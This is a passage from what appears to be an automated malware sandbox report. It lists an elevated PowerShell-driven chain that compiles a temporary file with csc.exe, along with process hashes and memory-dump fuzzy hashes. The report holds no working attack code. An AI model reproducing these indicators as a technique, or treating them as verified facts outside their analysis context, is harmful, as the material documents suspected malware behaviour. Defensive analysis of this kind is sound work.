                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6ee680000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:03:27:57
                                                Start date:22/11/2024
                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline"
                                                Imagebase:0x7ff66bc30000
                                                File size:2'759'232 bytes
                                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:4
                                                Start time:03:27:58
                                                Start date:22/11/2024
                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4568.tmp" "c:\Users\user\AppData\Local\Temp\dakef3hk\CSC7EF384CB672F47F5B690A91D9C6EAB3.TMP"
                                                Imagebase:0x7ff79e0b0000
                                                File size:52'744 bytes
                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true


                                                  Execution Graph

                                                  Execution Coverage:2.2%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:3
                                                  Total number of Limit Nodes:0
                                                  Execution graph (3 nodes): 7ffb4b2bc45d -> 7ffb4b2bc49b (CreateProcessA) -> 7ffb4b2bc80f

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2483067437.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7ffb4b2b0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: h\_H
                                                  • API String ID: 0-4283719453
                                                  • Opcode ID: 8d110f4fe11ca0951c13c1a678509cbd166fb7ae7d0649cbaa124a78d7286800
                                                  • Instruction ID: e0f00c97b0b85a4ada2b64eaa20ec5875bdd7ee50a162fb0f858bd5055eac089
                                                  • Opcode Fuzzy Hash: 8d110f4fe11ca0951c13c1a678509cbd166fb7ae7d0649cbaa124a78d7286800
                                                  • Instruction Fuzzy Hash: 3BE1C37051CA8D4FEB65EF28C8467E97BE1FB59310F04426EE84DC7291DF74A9818B82

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2483067437.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7ffb4b2b0000_powershell.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID: h\_H
                                                  • API String ID: 963392458-4283719453
                                                  • Opcode ID: 52e9162455794343e0ab4ce95224fc8715e28dfb5c448eb603b3bbf8d342ed02
                                                  • Instruction ID: 9c521088e7d6767fa9b68e469b1222aa3b51047420384f18e74e5064c0a477f7
                                                  • Opcode Fuzzy Hash: 52e9162455794343e0ab4ce95224fc8715e28dfb5c448eb603b3bbf8d342ed02
                                                  • Instruction Fuzzy Hash: 2FE1D27051CA8D4FDB65EF28C8467E57BE1FB59310F04426EE84DC7292DF74A9818B82

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2483934729.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7ffb4b380000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c42c44bb46ccfaf8fbe42310a06659ec51d6a35192fd725d044b21b43d8dcf68
                                                  • Instruction ID: 92626b2b28879e5dc39dacd215542a75637164440ff0037fb7937dcdd93630ae
                                                  • Opcode Fuzzy Hash: c42c44bb46ccfaf8fbe42310a06659ec51d6a35192fd725d044b21b43d8dcf68
                                                  • Instruction Fuzzy Hash: E6F126A290EFC60FEB56AB3998651757FE1EF4A210B0840FED18DC70A3DD186C168393

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2483934729.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7ffb4b380000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a67a2f06e4f6941184f8ec074233ab6e2e31625255991898d36da2d332b35d81
                                                  • Instruction ID: 7817b28e4da8dc313f33147dde5e12cd072cb3f6f36dac698997b53f628e10e2
                                                  • Opcode Fuzzy Hash: a67a2f06e4f6941184f8ec074233ab6e2e31625255991898d36da2d332b35d81
                                                  • Instruction Fuzzy Hash: AFD156A291EA895FEB66EF7CC8555B97FD1EF16210F0840FED18CC74A3E9189805C352

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2483934729.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7ffb4b380000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 92621c4c694ddccb09efa84c74b8ba93407050758076aea03740311ccc80498b
                                                  • Instruction ID: c50d617d90da9d5f3a99fdfa33fe928784b0ea2da366bde078ca579ca872ebd3
                                                  • Opcode Fuzzy Hash: 92621c4c694ddccb09efa84c74b8ba93407050758076aea03740311ccc80498b
                                                  • Instruction Fuzzy Hash: DA213AE2E1DE4A4FF7A5BE3DA84227566C2EF88350B5840BDD14DC31A2DD28BC164243

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2483067437.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7ffb4b2b0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8!^K$X"^K$` ^K$L_I$L_I
                                                  • API String ID: 0-1255659150
                                                  • Opcode ID: 60eb51d3b787df7770233e3aed5a3bffee4ed0644be5fbacea80faeefb0beb34
                                                  • Instruction ID: 9efbdbd7d496fded00a3c5f351c11af04b728f8c3d97d3e60a0c15d096b0275d
                                                  • Opcode Fuzzy Hash: 60eb51d3b787df7770233e3aed5a3bffee4ed0644be5fbacea80faeefb0beb34
                                                  • Instruction Fuzzy Hash: 4F22B9C3E0D5920AF3177EBCBD161F9EFD1EF857A470881BBD18C4A1AB6C245A4682D1